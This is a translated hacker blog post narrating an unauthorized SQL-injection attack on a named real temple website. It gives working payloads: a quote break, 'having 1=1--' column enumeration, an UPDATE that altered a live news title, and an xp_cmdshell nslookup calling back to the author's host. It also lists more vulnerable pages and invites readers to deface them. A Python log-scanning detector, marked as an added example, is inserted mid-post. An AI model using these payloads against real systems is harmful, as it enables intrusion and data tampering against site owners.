Just heard on the news that the Shaolin Temple website has published martial arts tips; hehe, now that's more fun!
So I went over to the Shaolin Temple website to take a look: http://www.shaolin.org.cn/
It opened and there was a news system. I browsed a few news items at random; they were all HTML, so it seemed there was no problem. But when I hovered the mouse over the news on the front page, I found its link was "javascript:MM_openBrWindow('../../../asp/news_article.asp?newsid=649','News','scrollbars=yes,width=520,height=400')". You may already have noticed there could be an injection point here. I had nothing to watch on TV anyway, so I decided to have a go.
1. Enter the address:
http://www.shaolin.org.cn/../../../asp/news_article.asp?newsid=649
The news opens, so the URL is correct. Add a ' after 649 and submit; it returns:
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/asp/lib/lib.asp, line 710
----------------------------------------------------------------------------------
So it should be a SQL Server database.
2. Use ' having 1=1--, and it hints:
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'Shaolin_newslist.newsid' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
/asp/lib/lib.asp, line 710
----------------------------------------------------------------------------------
Soon you can get all the fields of its table shaolin_newslist: newsid, newsupdatedat, newstitle, newscontent.
3. Next I tested the database user's permissions:
http://www.shaolin.org.cn/asp/news_article.asp?NewsID=649';Update%20shaolin_newslist%20set%20newstitle='Shaolin Medicine Bureau's hundreds of health recipes made public to the world for the first time!'%20where%20newsid=649--
Screenshot: photo.JPG (663395 bytes)
It appears to have full rights on the table; you can delete and modify.
4. Then look at port 1433:
telnet www.shaolin.org.cn 1433
It looks open.
5. Try the database operator's permissions.
Listen locally on UDP 53: nc -u -l -p 53
Then visit:
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649';
exec master.dbo.xp_cmdshell 'nslookup a.com *.*.*.*'--
(*.*.*.* is my IP address.)
No response, so it should not have sysadmin rights.
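From the defender's side, the five steps above leave a recognisable trail in the web server log. The following detection script is an added example and not part of the original post; it assumes IIS W3C logs with the field order given in the code, uses the documentation address 192.0.2.1 in place of the redacted *.*.*.*, and shortens the injected title to 'x'. All log lines are constructed.

```python
"""Flag SQL-injection probes like those above in IIS-style web logs (added example)."""
import re
from urllib.parse import parse_qs, unquote_plus

# Signatures of the probes in the write-up: a quote ending a numeric id, the
# HAVING 1=1-- column-enumeration trick, a data-changing statement, an
# xp_cmdshell call, and the trailing comment that discards the rest of the query.
PATTERNS = [
    ("quote-break", re.compile(r"^\d+\s*'")),
    ("having-enum", re.compile(r"\bhaving\s+1\s*=\s*1", re.I)),
    ("dml", re.compile(r"\b(update|delete|insert)\b.*\b(set|from|into)\b", re.I)),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("comment-tail", re.compile(r"--\s*$")),
]

def classify_query(query: str) -> list[str]:
    """Return the pattern names matched by any value in a URL query string."""
    hits = []
    for values in parse_qs(query, keep_blank_values=True).values():
        for raw in values:
            value = unquote_plus(raw)  # also strips a second layer of %-encoding
            for name, rx in PATTERNS:
                if rx.search(value) and name not in hits:
                    hits.append(name)
    return hits

def scan_log(lines):
    """Yield (client_ip, uri_stem, hits) for suspicious W3C-style log lines.
    Assumed fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        query = "" if fields[5] == "-" else fields[5]
        hits = classify_query(query)
        if hits:
            yield fields[2], fields[4], hits

# Constructed log lines replaying the five steps; 192.0.2.1 stands in for the
# redacted *.*.*.* and the newstitle value is shortened to 'x'.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-04-10 21:13:05 192.0.2.1 GET /asp/news_article.asp newsid=649 200
2003-04-10 21:13:20 192.0.2.1 GET /asp/news_article.asp newsid=649' 500
2003-04-10 21:13:41 192.0.2.1 GET /asp/news_article.asp newsid=649'%20having%201=1-- 500
2003-04-10 21:14:02 192.0.2.1 GET /asp/news_article.asp NewsID=649';Update%20shaolin_newslist%20set%20newstitle='x'%20where%20newsid=649-- 200
2003-04-10 21:14:30 192.0.2.1 GET /asp/news_article.asp NewsID=649';exec%20master.dbo.xp_cmdshell%20'nslookup%20a.com%20192.0.2.1'-- 200
""".splitlines()

if __name__ == "__main__":
    for ip, stem, hits in scan_log(SAMPLE_LOG):
        print(ip, stem, ",".join(hits))
```

The first, harmless request produces no hit; the four probes are each flagged with the specific signatures they trip, and a 500 status next to a quote-break hit is the ODBC error page the attacker read.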
It seems the permissions stop there. Since there was no way to gather system information, and I didn't intend to anyway, that's it for now! In fact, many pages have this problem, such as:
http://www.shaolin.org.cn/html/html/wu/menu4.htm
http://www.shaolin.org.cn/html/html/wu/teach_wushu.asp
at the places where parameters are passed. Seen the martial arts? If you like, you can give him some "XXX", hehe!
In fact, a year ago I used a similar method to test a fairly large local portal site and then submitted a vulnerability report to them, but the holes are still there. To avoid causing trouble for myself I haven't published it; once they fix it, I'll release the details!
====================================================================================================
Reported to the webmaster: no response. On the BBS I registered as Coolersky, but couldn't figure out how to post, no luck! Resign yourself to fate; let's just hope it isn't the little Japanese who get to it!